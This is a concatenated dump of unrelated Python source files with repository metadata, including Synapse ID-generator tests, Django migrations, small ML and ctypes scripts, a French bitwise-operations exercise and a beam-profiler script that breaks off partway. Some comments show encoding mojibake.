self._is_cam_enabled = True
self.toggle_cam_button.setText("&Disable camera")
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
myApp = My_App()
myApp.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
aa550b9d70afa052455b756486553b52339601ec | 7c73569deb98d61728139893d3cb08496b667fc6 | /manage.py | 44b6a2ce62816229580a063df9273b4e6b391f6d | [] | no_license | creationyun/CrawlingRules | b9969699614d40bd5372bbd9f92bdb5740d3aeaa | 79ff145d291f07986445cedb0bc17240155d6576 | refs/heads/master | 2021-01-13T22:10:43.737755 | 2020-10-11T17:12:26 | 2020-10-11T17:12:26 | 242,510,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'CrawlingRules.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
87dcadbf061948de9f9af6d8d77364e0cfe6eaad | e22aed3aebfcb02801b854585a7327f33a94aa28 | /tests/storage/test_id_generators.py | f0a8e32f1eaf3de7b0791d5fc27b5e79c7cf49a3 | [
"Apache-2.0"
] | permissive | sea87321/synapse | 769fff0f893cf662878afe3f85ade089578512d5 | ab903e7337f6c2c7cfcdac69b13dedf67e56d801 | refs/heads/master | 2022-12-28T21:21:40.988005 | 2020-09-24T15:35:31 | 2020-09-24T15:35:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,050 | py | # -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.storage.database import DatabasePool
from synapse.storage.util.id_generators import MultiWriterIdGenerator
from tests.unittest import HomeserverTestCase
from tests.utils import USE_POSTGRES_FOR_TESTS
class MultiWriterIdGeneratorTestCase(HomeserverTestCase):
if not USE_POSTGRES_FOR_TESTS:
skip = "Requires Postgres"
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.db_pool = self.store.db_pool # type: DatabasePool
self.get_success(self.db_pool.runInteraction("_setup_db", self._setup_db))
def _setup_db(self, txn):
txn.execute("CREATE SEQUENCE foobar_seq")
txn.execute(
"""
CREATE TABLE foobar (
stream_id BIGINT NOT NULL,
instance_name TEXT NOT NULL,
data TEXT
);
"""
)
def _create_id_generator(self, instance_name="master") -> MultiWriterIdGenerator:
def _create(conn):
return MultiWriterIdGenerator(
conn,
self.db_pool,
instance_name=instance_name,
table="foobar",
instance_column="instance_name",
id_column="stream_id",
sequence_name="foobar_seq",
)
return self.get_success(self.db_pool.runWithConnection(_create))
def _insert_rows(self, instance_name: str, number: int):
"""Insert N rows as the given instance, inserting with stream IDs pulled
from the postgres sequence.
"""
def _insert(txn):
for _ in range(number):
txn.execute(
"INSERT INTO foobar VALUES (nextval('foobar_seq'), ?)",
(instance_name,),
)
self.get_success(self.db_pool.runInteraction("_insert_rows", _insert))
def _insert_row_with_id(self, instance_name: str, stream_id: int):
"""Insert one row as the given instance with given stream_id, updating
the postgres sequence position to match.
"""
def _insert(txn):
txn.execute(
"INSERT INTO foobar VALUES (?, ?)", (stream_id, instance_name,),
)
txn.execute("SELECT setval('foobar_seq', ?)", (stream_id,))
self.get_success(self.db_pool.runInteraction("_insert_row_with_id", _insert))
def test_empty(self):
"""Test an ID generator against an empty database gives sensible
current positions.
"""
id_gen = self._create_id_generator()
# The table is empty so we expect an empty map for positions
self.assertEqual(id_gen.get_positions(), {})
def test_single_instance(self):
"""Test that reads and writes from a single process are handled
correctly.
"""
# Prefill table with 7 rows written by 'master'
self._insert_rows("master", 7)
id_gen = self._create_id_generator()
self.assertEqual(id_gen.get_positions(), {"master": 7})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 7)
# Try allocating a new ID gen and check that we only see position
# advanced after we leave the context manager.
async def _get_next_async():
with await id_gen.get_next() as stream_id:
self.assertEqual(stream_id, 8)
self.assertEqual(id_gen.get_positions(), {"master": 7})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 7)
self.get_success(_get_next_async())
self.assertEqual(id_gen.get_positions(), {"master": 8})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 8)
def test_multi_instance(self):
"""Test that reads and writes from multiple processes are handled
correctly.
"""
self._insert_rows("first", 3)
self._insert_rows("second", 4)
first_id_gen = self._create_id_generator("first")
second_id_gen = self._create_id_generator("second")
self.assertEqual(first_id_gen.get_positions(), {"first": 3, "second": 7})
self.assertEqual(first_id_gen.get_current_token_for_writer("first"), 3)
self.assertEqual(first_id_gen.get_current_token_for_writer("second"), 7)
# Try allocating a new ID gen and check that we only see position
# advanced after we leave the context manager.
async def _get_next_async():
with await first_id_gen.get_next() as stream_id:
self.assertEqual(stream_id, 8)
self.assertEqual(
first_id_gen.get_positions(), {"first": 3, "second": 7}
)
self.get_success(_get_next_async())
self.assertEqual(first_id_gen.get_positions(), {"first": 8, "second": 7})
# However the ID gen on the second instance won't have seen the update
self.assertEqual(second_id_gen.get_positions(), {"first": 3, "second": 7})
# ... but calling `get_next` on the second instance should give a unique
# stream ID
async def _get_next_async():
with await second_id_gen.get_next() as stream_id:
self.assertEqual(stream_id, 9)
self.assertEqual(
second_id_gen.get_positions(), {"first": 3, "second": 7}
)
self.get_success(_get_next_async())
self.assertEqual(second_id_gen.get_positions(), {"first": 3, "second": 9})
# If the second ID gen gets told about the first, it correctly updates
second_id_gen.advance("first", 8)
self.assertEqual(second_id_gen.get_positions(), {"first": 8, "second": 9})
def test_get_next_txn(self):
"""Test that the `get_next_txn` function works correctly.
"""
# Prefill table with 7 rows written by 'master'
self._insert_rows("master", 7)
id_gen = self._create_id_generator()
self.assertEqual(id_gen.get_positions(), {"master": 7})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 7)
# Try allocating a new ID gen and check that we only see position
# advanced after we leave the context manager.
def _get_next_txn(txn):
stream_id = id_gen.get_next_txn(txn)
self.assertEqual(stream_id, 8)
self.assertEqual(id_gen.get_positions(), {"master": 7})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 7)
self.get_success(self.db_pool.runInteraction("test", _get_next_txn))
self.assertEqual(id_gen.get_positions(), {"master": 8})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 8)
def test_get_persisted_upto_position(self):
"""Test that `get_persisted_upto_position` correctly tracks updates to
positions.
"""
# The following tests are a bit cheeky in that we notify about new
# positions via `advance` without *actually* advancing the postgres
# sequence.
self._insert_row_with_id("first", 3)
self._insert_row_with_id("second", 5)
id_gen = self._create_id_generator("first")
self.assertEqual(id_gen.get_positions(), {"first": 3, "second": 5})
# Min is 3 and there is a gap between 5, so we expect it to be 3.
self.assertEqual(id_gen.get_persisted_upto_position(), 3)
# We advance "first" straight to 6. Min is now 5 but there is no gap so
# we expect it to be 6
id_gen.advance("first", 6)
self.assertEqual(id_gen.get_persisted_upto_position(), 6)
# No gap, so we expect 7.
id_gen.advance("second", 7)
self.assertEqual(id_gen.get_persisted_upto_position(), 7)
# We haven't seen 8 yet, so we expect 7 still.
id_gen.advance("second", 9)
self.assertEqual(id_gen.get_persisted_upto_position(), 7)
# Now that we've seen 7, 8 and 9 we can got straight to 9.
id_gen.advance("first", 8)
self.assertEqual(id_gen.get_persisted_upto_position(), 9)
# Jump forward with gaps. The minimum is 11, even though we haven't seen
# 10 we know that everything before 11 must be persisted.
id_gen.advance("first", 11)
id_gen.advance("second", 15)
self.assertEqual(id_gen.get_persisted_upto_position(), 11)
def test_get_persisted_upto_position_get_next(self):
"""Test that `get_persisted_upto_position` correctly tracks updates to
positions when `get_next` is called.
"""
self._insert_row_with_id("first", 3)
self._insert_row_with_id("second", 5)
id_gen = self._create_id_generator("first")
self.assertEqual(id_gen.get_positions(), {"first": 3, "second": 5})
self.assertEqual(id_gen.get_persisted_upto_position(), 3)
with self.get_success(id_gen.get_next()) as stream_id:
self.assertEqual(stream_id, 6)
self.assertEqual(id_gen.get_persisted_upto_position(), 3)
self.assertEqual(id_gen.get_persisted_upto_position(), 6)
# We assume that so long as `get_next` does correctly advance the
# `persisted_upto_position` in this case, then it will be correct in the
# other cases that are tested above (since they'll hit the same code).
class BackwardsMultiWriterIdGeneratorTestCase(HomeserverTestCase):
"""Tests MultiWriterIdGenerator that produce *negative* stream IDs.
"""
if not USE_POSTGRES_FOR_TESTS:
skip = "Requires Postgres"
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.db_pool = self.store.db_pool # type: DatabasePool
self.get_success(self.db_pool.runInteraction("_setup_db", self._setup_db))
def _setup_db(self, txn):
txn.execute("CREATE SEQUENCE foobar_seq")
txn.execute(
"""
CREATE TABLE foobar (
stream_id BIGINT NOT NULL,
instance_name TEXT NOT NULL,
data TEXT
);
"""
)
def _create_id_generator(self, instance_name="master") -> MultiWriterIdGenerator:
def _create(conn):
return MultiWriterIdGenerator(
conn,
self.db_pool,
instance_name=instance_name,
table="foobar",
instance_column="instance_name",
id_column="stream_id",
sequence_name="foobar_seq",
positive=False,
)
return self.get_success(self.db_pool.runWithConnection(_create))
def _insert_row(self, instance_name: str, stream_id: int):
"""Insert one row as the given instance with given stream_id.
"""
def _insert(txn):
txn.execute(
"INSERT INTO foobar VALUES (?, ?)", (stream_id, instance_name,),
)
self.get_success(self.db_pool.runInteraction("_insert_row", _insert))
def test_single_instance(self):
"""Test that reads and writes from a single process are handled
correctly.
"""
id_gen = self._create_id_generator()
with self.get_success(id_gen.get_next()) as stream_id:
self._insert_row("master", stream_id)
self.assertEqual(id_gen.get_positions(), {"master": -1})
self.assertEqual(id_gen.get_current_token_for_writer("master"), -1)
self.assertEqual(id_gen.get_persisted_upto_position(), -1)
with self.get_success(id_gen.get_next_mult(3)) as stream_ids:
for stream_id in stream_ids:
self._insert_row("master", stream_id)
self.assertEqual(id_gen.get_positions(), {"master": -4})
self.assertEqual(id_gen.get_current_token_for_writer("master"), -4)
self.assertEqual(id_gen.get_persisted_upto_position(), -4)
# Test loading from DB by creating a second ID gen
second_id_gen = self._create_id_generator()
self.assertEqual(second_id_gen.get_positions(), {"master": -4})
self.assertEqual(second_id_gen.get_current_token_for_writer("master"), -4)
self.assertEqual(second_id_gen.get_persisted_upto_position(), -4)
def test_multiple_instance(self):
"""Tests that having multiple instances that get advanced over
federation works corretly.
"""
id_gen_1 = self._create_id_generator("first")
id_gen_2 = self._create_id_generator("second")
with self.get_success(id_gen_1.get_next()) as stream_id:
self._insert_row("first", stream_id)
id_gen_2.advance("first", stream_id)
self.assertEqual(id_gen_1.get_positions(), {"first": -1})
self.assertEqual(id_gen_2.get_positions(), {"first": -1})
self.assertEqual(id_gen_1.get_persisted_upto_position(), -1)
self.assertEqual(id_gen_2.get_persisted_upto_position(), -1)
with self.get_success(id_gen_2.get_next()) as stream_id:
self._insert_row("second", stream_id)
id_gen_1.advance("second", stream_id)
self.assertEqual(id_gen_1.get_positions(), {"first": -1, "second": -2})
self.assertEqual(id_gen_2.get_positions(), {"first": -1, "second": -2})
self.assertEqual(id_gen_1.get_persisted_upto_position(), -2)
self.assertEqual(id_gen_2.get_persisted_upto_position(), -2)
| [
"[email protected]"
] | |
4e272faf6e60d70565198c3dde769e3ee4de92da | 86a84cf4c1e285d92c084d6eaf0e0219e5b997fe | /join function.py | 5c9826f36ecb9c6cbea254e0cc861d8c3a1d01ef | [] | no_license | Ayush181005/Intermediate-and-Advance-Python | 225e2b0d9f4643351e256c1fad3840bab08f0e61 | 93e352c5fc04513c4f5e65d773d33ffccf5b146b | refs/heads/master | 2023-08-05T23:51:19.274574 | 2021-09-26T10:47:58 | 2021-09-26T10:47:58 | 410,524,129 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | sampleList = ['chalk', 'duster', 'board', 'pen']
# => chalk and duster and board and pen
for item in sampleList:
if item != 'pen':
print(item + " and ", end="")
else:
print(item)
print(' and '.join(sampleList)) | [
"[email protected]"
] | |
b578b6bd112d8de72c4bfad24d739dfeea7db7e6 | 91a7fad1c423c57dc04084820c91d29e2013848c | /blog/migrations/0022_resumedocument.py | 351f11fa81361e786e03d7fb3ad4cf058bc6d213 | [] | no_license | connorgillis/ProjectsPortfolio | d9c317e4663a3bff48fe5879b5d2189c1ea3712f | d599b22fac7bad93fc3434e393ec866ce61b6fff | refs/heads/master | 2022-12-12T10:32:35.624564 | 2020-09-10T19:43:23 | 2020-09-10T19:43:23 | 294,500,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,116 | py | # Generated by Django 2.2.9 on 2020-02-08 00:09
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('wagtaildocs', '0010_document_file_hash'),
('wagtailcore', '0041_group_collection_permissions_verbose_name_plural'),
('blog', '0021_auto_20200201_2016'),
]
operations = [
migrations.CreateModel(
name='ResumeDocument',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('categories', modelcluster.fields.ParentalManyToManyField(blank=True, to='blog.ResumeCategory')),
('doc', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtaildocs.Document')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
]
| [
"[email protected]"
] | |
5ef91587ec64fa984660640df2ba412f8602d443 | b8eb666c8b6fe4610d87bff8048f4a95a1c5b549 | /ๆต่ฏ/UI่ชๅจๅ/ๆต่ฏๅทฅๅ
ท__Appium/Project/bin/case_generate.py | 14e7209b8c867671ecf5c98ccdcb17f472a73948 | [] | no_license | cainiaosun/study | 1e983e404005e537410b205634a27cee974faba0 | 91df9b63cda1839b7fc60de3b5f1eb19ccc33a1f | refs/heads/master | 2020-05-30T09:59:19.749099 | 2019-11-22T10:39:12 | 2019-11-22T10:39:12 | 189,641,828 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,083 | py | #ๅๅปบๅฏๆง่ก็unittestๆกไพ
import sys
sys.path.append("..")
from util.case_excel_deal import DataTable
def GenerateCase(path):
file=path+"/autocase.py"
with open(file,"w") as fp:
fp.write("""
import sys
sys.path.append("../")
from util.case_excel_deal import DataTable
from util.write_log import Log
import unittest_main
class AutoCase(unittest_main.mukewang):""")
case_list=DataTable(path+"/runningcase.xls").case_list()
for i in range(0,len(case_list)):
testid=str(i).rjust(5,"0")
fp.write("""
def test_"""+testid+"""(self):
Log().info("Excute Case:test"+str(\""""+testid+"""\"))
index=int("""+str(i)+""")
case_list=DataTable("Case_ID",path+"/runningcase.xls").case_list()
col_values=DataTable("Case_ID",path=path+"/runningcase.xls").col_values
start=col_values.index(case_list[index])
count=col_values.count(case_list[index])
end=start+count
Log().info("Case Name:"+DataTable("Case_ID",path=path+"/runningcase.xls").value)
for i in range(start,end):
self.crete_step(i)
""")
#fp.close()
if __name__=="__main__":
GenerateCase(".") | [
"[email protected]"
] | |
dcbe08a694faaa04b472a28a23fa0a38a1b0ef93 | a903599d1b2e570a19ac2caffffa1445f17a44c4 | /app/cms/migrations/0002_auto_20181009_1455.py | f2622cc7403e7752e1aefd9b4b2ba17ba04c2643 | [
"MIT"
] | permissive | wdr-data/wdrforyou-cms | d1d482e41fd5ed2d75ae3b96abb49aa6f56be7f5 | 1260ef30ad17669caccb0f3b2aade984facef4b2 | refs/heads/master | 2022-12-12T14:52:23.106496 | 2020-06-06T17:21:42 | 2020-06-06T17:21:42 | 152,069,052 | 0 | 0 | MIT | 2022-12-08T03:12:57 | 2018-10-08T11:30:40 | Python | UTF-8 | Python | false | false | 1,579 | py | # Generated by Django 2.1.2 on 2018-10-09 14:55
from enum import Enum
import cms.models.translations
from django.db import migrations, models
import django.db.models.deletion
class Language(Enum):
ARABIC = 'arabic'
PERSIAN = 'persian'
ENGLISH = 'english'
class Migration(migrations.Migration):
dependencies = [
('cms', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ReportTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language', models.CharField(choices=[(Language('arabic'), 'arabic'), (Language('persian'), 'persian'), (Language('english'), 'english')], max_length=640, verbose_name='Sprache')),
('text', models.CharField(max_length=640, verbose_name='Text รbersetzung')),
],
options={
'verbose_name': 'Meldungs-รbersetzung',
'verbose_name_plural': 'Meldungs-รbersetzung',
'ordering': ('id',),
},
),
migrations.AddField(
model_name='report',
name='german',
field=models.BooleanField(blank=True, default=False, verbose_name='Deutsch'),
),
migrations.AddField(
model_name='reporttranslation',
name='report',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='translations', related_query_name='translation', to='cms.Report'),
),
]
| [
"[email protected]"
] | |
aaa1540d356a3b522b1acfaeb7f18be71bbefcdf | 7c96ece477ef41d7108cf818a530c56e1cfc4b6d | /funcshell/utils.py | 14e38c0b956e418d8cfb3bcd2874bc86dc35cbfb | [
"MIT"
] | permissive | hien/funcshell | 3d25cd295c1c09dd0486a5fac968fda98dd64b7e | ddcaad425e44fc9a56acaf26c6496a99358d0482 | refs/heads/master | 2020-12-25T14:08:49.778448 | 2010-12-25T07:00:40 | 2010-12-25T07:00:40 | 1,808,310 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 652 | py | import cmd
class EasyShell(cmd.Cmd):
def __init__(self, callback, prompt='> '):
cmd.Cmd.__init__(self)
self.callback = callback
self.prompt = prompt
self.use_rawinput = True
def default(self, line):
if line == 'EOF':
print ''
return self.do_exit(line)
self.callback(line)
def do_exit(self, line):
return True
def do_help(self, line):
self.help_exit()
def emptyline(self):
pass
def help_exit(self):
print 'Type exit to quit the shell.'
def help_help(self):
pass
def run(self):
self.cmdloop()
| [
"[email protected]"
] | |
78f177a75a2e1238ecb60c88659a2e09df68f922 | 83129b26063ddbf0fd0bbabd929659499ad59eb9 | /ann.py | 4851ff7e3046bb20e8511a8b7bc955e56a516c25 | [] | no_license | baxton-sg/test | ae5d09412c3d4f62b36cd616541ad0c0c09622e0 | ae09b1858c468a0d81c91da0c69028a5ced89d3d | refs/heads/master | 2021-01-01T16:30:22.464937 | 2016-02-04T09:01:08 | 2016-02-04T09:01:08 | 38,250,505 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,680 | py |
import os
import sys
import numpy as np
import scipy as sp
from sklearn.ensemble import RandomForestClassifier
import matplotlib.pyplot as plt
import ctypes
#import ann_py
#ANN_DLL = ctypes.cdll.LoadLibrary(r"/home/maxim/kaggle/ann/libann.so")
ANN_DLL = ctypes.cdll.LoadLibrary(r"c:\\temp\\test_python\\ann\\ann2.dll")
class ANN(object):
def __init__(self, sizes):
self.ss = np.array(sizes, dtype=np.int32)
self.ann = ANN_DLL.ann_create(self.ss.ctypes.data, ctypes.c_int(self.ss.shape[0]))
self.alpha = ctypes.c_double(.0001)
self.cost = ctypes.c_double(0.)
def partial_fit(self, X, Y, dummy, out_params=None):
R = X.shape[0] if len(X.shape) == 2 else 1
ANN_DLL.ann_fit(ctypes.c_void_p(self.ann), X.ctypes.data, Y.ctypes.data, ctypes.c_int(R), ctypes.addressof(self.alpha), ctypes.c_double(16), ctypes.c_int(1), ctypes.addressof(self.cost))
if None != out_params:
out_params.append(self.alpha.value)
out_params.append(self.cost)
def predict_proba(self, X):
if type(X) == list:
X = np.array(X, dtype=np.float64)
R = X.shape[0] if len(X.shape) == 2 else 1
C = self.ss[-1]
predictions = np.array([0] * R * C, dtype=np.float64)
ANN_DLL.ann_predict(ctypes.c_void_p(self.ann), X.ctypes.data, predictions.ctypes.data, ctypes.c_int(R))
predictions = predictions.reshape((R, C))
if C == 1:
res = np.zeros((R, 2), dtype=np.float64)
for i,v in enumerate(predictions):
res[i,0] = 1. - v[0]
res[i,1] = v[0]
return res
return predictions
| [
"[email protected]"
] | |
9a4b038c518a883a5160c78780c32010eb158b30 | 6b31e416b23ffba2e2269588d767783d1806190c | /classifier.py | c8c953a66afe03ea0a4bfdf20cc4cc40e8e81485 | [] | no_license | fatemehYP/Decision_support_system | 6decea4fc9e4c9cd041376eb25c961ef6ab90292 | 40ef3d2f4bdd90fd91e331542fb9cd8a70b3a398 | refs/heads/master | 2023-03-04T19:46:34.866756 | 2021-02-18T14:44:18 | 2021-02-18T14:44:18 | 335,388,144 | 0 | 1 | null | 2021-02-18T14:44:19 | 2021-02-02T18:39:14 | Python | UTF-8 | Python | false | false | 1,489 | py | from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.multiclass import OneVsRestClassifier
from sklearn.cluster import KMeans
from sklearn.metrics import classification_report, confusion_matrix
import numpy as np
from matplotlib import style
import matplotlib.pyplot as plt
import pandas as pd
import ipdb
class_weight = {0: 0.2, 1: 0.2, 2: 0.6, 3: 0.4, 4: 0.2, 5: 0.45, 6: 0.4, 7: 0.25, 8: 0.7, 9: 1,
10: 0.8, 11: 0.6}
# read dataset
df = pd.read_excel("Emergency_casebase.xls")
X = np.array(df.astype(float))
df_label = pd.read_excel("classes.xls")
y = np.array(df_label)
model = LogisticRegression(solver='liblinear', multi_class='ovr', random_state=0).fit(X, y)
input2 = np.array([[1, 0, 15, 1, 1, 0, 0, 0],
[0, 0, 62, 1, 0, 1, 0, 1],
[0, 2, 62, 1, 1, 0, 0, 0],
[1, 0, 62, 1, 3, 1, 0, 0],
[2, 0, 100, 0, 5, 0, 1, 1],
[3, 0, 225, 1, 1, 1, 0, 1],
[0, 2, 15, 1, 1, 0, 0, 0],
[0, 1, 30.5, 1, 3, 1, 2, 1],
[0, 1, 15, 1, 5, 1, 0, 1],
[1, 1, 50, 1, 5, 1, 0, 1],
[1, 1, 50, 1, 5, 1, 0, 1],
[1, 0, 27, 1, 1, 0, 1, 0]])
y_predict = model.predict(input2)
print(model.score(input2, y))
ipdb.set_trace()
# count = 0
# for i in range(12):
# count += model.predict_proba(input2)[11][i]
# print(count)
| [
"[email protected]"
] | |
cbc4a539ea136c64e60d55784fbf7e3e82802e68 | 0418e5bed489056a6c39e08aa6346dbd4ded52ea | /ARCHIVES/sujet_etude_1_operations_binaires_correction.py | 08a19f25122f949f597d7b741bced96a0dd5fa5e | [
"CC-BY-4.0"
] | permissive | michaelguedj/ens__prog_sci_python | a14110e6357c3b14025744beb61c78db4f661f51 | bb4c323ee90e94d15cbb21898ca7591f5fc28bbd | refs/heads/master | 2022-05-14T02:57:51.723191 | 2022-05-09T08:03:13 | 2022-05-09T08:03:13 | 220,700,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | # coding: utf-8
import math
# Opรฉrations binaires
# Fonctions
""" Rรฉalisez la fonction not() qui prend en argument un bit et
retourne sa nรฉgation. """
def non(b):
if b == 0:
return 1
if b == 1:
return 0
""" Rรฉalisez la fonction or() qui prend en argument deux bits et
retourne leur disjonction. """
def ou(b1, b2):
if b1 == 1:
return 1
if b2 == 1:
return 1
# sinon b1=0 et b2=0
return 0
""" Rรฉalisez la fonction and() qui prend en argument deux bits et
retourne leur conjonction. """
def et(b1, b2):
if b1 == 0:
return 0
if b2 == 0:
return 0
# sinon b1=1 et b2=1
return 1
# Opรฉrations bits ร bits sur les octets
# Structure de donnรฉes
""" Dรฉterminez la structure de donnรฉe nรฉcessaire pour stocker
un octet (8 bits). """
o1 = [1,0,0,1,1,1,1,0]
o2 = [1,1,1,1,0,0,0,0]
# Fonctions
""" Rรฉalisez la fonction not_octet() qui prend en argument un
octet et retourne sa nรฉgation bit ร bit. """
def non_oct(o):
res = [0]*8
for i in range(8):
res[i] = non(o[i])
return res
""" Rรฉalisez la fonction or_octet() qui prend en argument deux
octets et retourne leur disjonction bit ร bit. """
def ou_oct(o1, o2):
res = [0]*8
for i in range(8):
res[i] = ou(o1[i], o2[i])
return res
""" Rรฉalisez la fonction and_octet() qui prend en argument deux
octets et retourne leur conjonction bit ร bit. """
def et_oct(o1, o2):
res = [0]*8
for i in range(8):
res[i] = et(o1[i], o2[i])
return res
# Test
print(o1)
print(non_oct(o1))
print("")
print(o1)
print(o2)
print(ou_oct(o1,o2))
print("")
print(o1)
print(o2)
print(et_oct(o1,o2))
| [
"[email protected]"
] | |
e606513f2ccc7192a823d3fe94ad4e3c38c0ee03 | 82fac45e29297da3431bcc0c5732b8341daf700a | /python_software/Beamprofiler_Autocorrelator_v0.9.py | 6120f7586e74b398897ffd28174a14b45225a358 | [] | no_license | kgfrog/beamprofiler | a9584fd49920e0836656b82c375d7acc9ff9bd7d | bd66509431e4e66de9fbd76f4367bf1ce932d092 | refs/heads/master | 2022-11-26T08:05:41.948663 | 2020-07-25T07:45:01 | 2020-07-25T07:45:01 | 250,818,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,824 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 15 09:10:12 2019
@author: frog
"""
import tkinter as tk
import tkinter.ttk as ttk
import tkinter.filedialog as tkfd
#import tkinter.messagebox as tkmsg
#import os
#import glob
import cv2
#import sys
import matplotlib.pyplot as plt
import numpy as np
#import math
import pandas as pd
#import csv
#from scipy.linalg import solve
#import sympy as sym
import scipy.optimize
#from natsort import natsorted
#from picamera.array import PiRGBArray
#from picamera import PiCamera
import time
from PIL import Image, ImageTk
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import platform
if platform.system() == "Windows":
try:
from instrumental.drivers.cameras import uc480
except:
pass
from win32api import GetSystemMetrics
screenwidth = GetSystemMetrics(0)
screenheight = GetSystemMetrics(1)
#elif platform.system() == Darwin:
class CV2:
def beam_normalize(img_data): #่ฆๆ ผๅ
GUI.dark_offset()
if dark == 21:
img_data = abs(img_data-dark_data)
imgmin = np.min(img_data)
data0 = img_data-imgmin
imgmax = np.max(data0)
ndata = data0/imgmax
return ndata
def beam_row_columns(img_data, ndata): #ใใผใฏใฎ่กๅใใผใฟ
global numrow, numcolumn
minVal, maxVal, minLoc, maxLoc = cv2.minMaxLoc(img_data)
numrow = maxLoc[1]
numcolumn = maxLoc[0]
datarow = ndata[numrow,:]
datacolumn = ndata[:,numcolumn]
dr = pd.Series(datarow)
dc = pd.Series(datacolumn)
return dr, dc
def tracking(data):
global numrow,numcolumn
trackingimg = np.copy(data)
if varv.get() == True:
numrow = int(cam_res_h-1-verticalslider.get())
if varh.get() == True:
numcolumn = int(horizontalslider.get())
datarow = data[numrow,:]
datacolumn = data[:,numcolumn]
dr = pd.Series(datarow)
dc = pd.Series(datacolumn)
#trackingimg[numrow,:] = 0
#trackingimg[:,numcolumn] = 0
trackingimg = cv2.line(trackingimg,(0,numrow),(len(datarow)-1,numrow),color=0,thickness=2)
trackingimg = cv2.line(trackingimg,(numcolumn,0),(numcolumn,len(datacolumn)-1),color=0,thickness=2)
return trackingimg, dr, dc
def beam_peak(data): #ใใผใฏๆฝๅบ
data_peak = data.iloc[data.sub(1).abs().argsort()[:2]]
data_index = list(data_peak.index)
data_peak = (data_index[0]-data_index[1])/2+data_index[1]
data_peak = round(data_peak)
return data_peak
def beam_intensity(dr, dc, dr_peak, dc_peak): #ใใผใฏไธญๅฟใฎใใผใ ๅผทๅบฆใฎใใผใฟ
dr_res = []
dc_res = []
dr_peak = np.array(dr_peak, dtype="int64")
dc_peak = np.array(dc_peak, dtype="int64")
for i in range(-dr_peak+2,cam_res_w-dr_peak+2):
dr_res.append(i)
for j in range(-dc_peak+2,cam_res_h-dc_peak+2):
dc_res.append(j)
dr_data = pd.DataFrame({"row_num" : dr_res, "intensity" : dr})
dr_data = dr_data.set_index("row_num",drop=True)
dc_data = pd.DataFrame({"col_num" : dc_res, "intensity" : dc})
dc_data = dc_data.set_index("col_num",drop=True)
return dr_data, dc_data
def beam_size(linedata, linedata_peak, percent_of_intensity): #ใใผใ ใตใคใบ็ฎๅบ(px)
linedata_cut_0 = linedata[0:linedata_peak-1]
linedata_cut_1 = linedata[linedata_peak-1:len(linedata)]
linedata_size_0 = linedata_cut_0.iloc[linedata_cut_0.sub(percent_of_intensity).abs().argsort()[:1]]
linedata_size_1 = linedata_cut_1.iloc[linedata_cut_1.sub(percent_of_intensity).abs().argsort()[:1]]
linedata_size_index_0 = list(linedata_size_0.index)
linedata_size_index_1 = list(linedata_size_1.index)
linedata_size = linedata_size_index_1[0] - linedata_size_index_0[0]
return linedata_size
def from_pixel_to_beam_width(pixel_width, unit):
if "C1284R13C" in cam_name:
if "mm" in unit:
beam_width = 3.6*10**(-3)*pixel_width
elif "um" in unit:
beam_width = 3.6*pixel_width
elif "C1285R12M" in cam_name:
if "mm" in unit:
beam_width = 5.2*10**(-3)*pixel_width
elif "um" in unit:
beam_width = 5.2*pixel_width
elif "test" in cam_name:
if "mm" in unit:
beam_width = 1.4*10**(-3)*pixel_width
elif "um" in unit:
beam_width = 1.4*pixel_width
else:
beam_width = pixel_width
beam_width = round(beam_width, 3)
return beam_width
def pixel_to_realsize(pixel_data, unit):
realsize = []
for i in pixel_data.index.values:
realsize_data = CV2.from_pixel_to_beam_width(i, unit)
realsize.append(realsize_data)
return realsize
def fitting(data):
n = len(data)
a11 = n
a12 = data.index.values.sum()
a13 = data.index.values.sum()**2
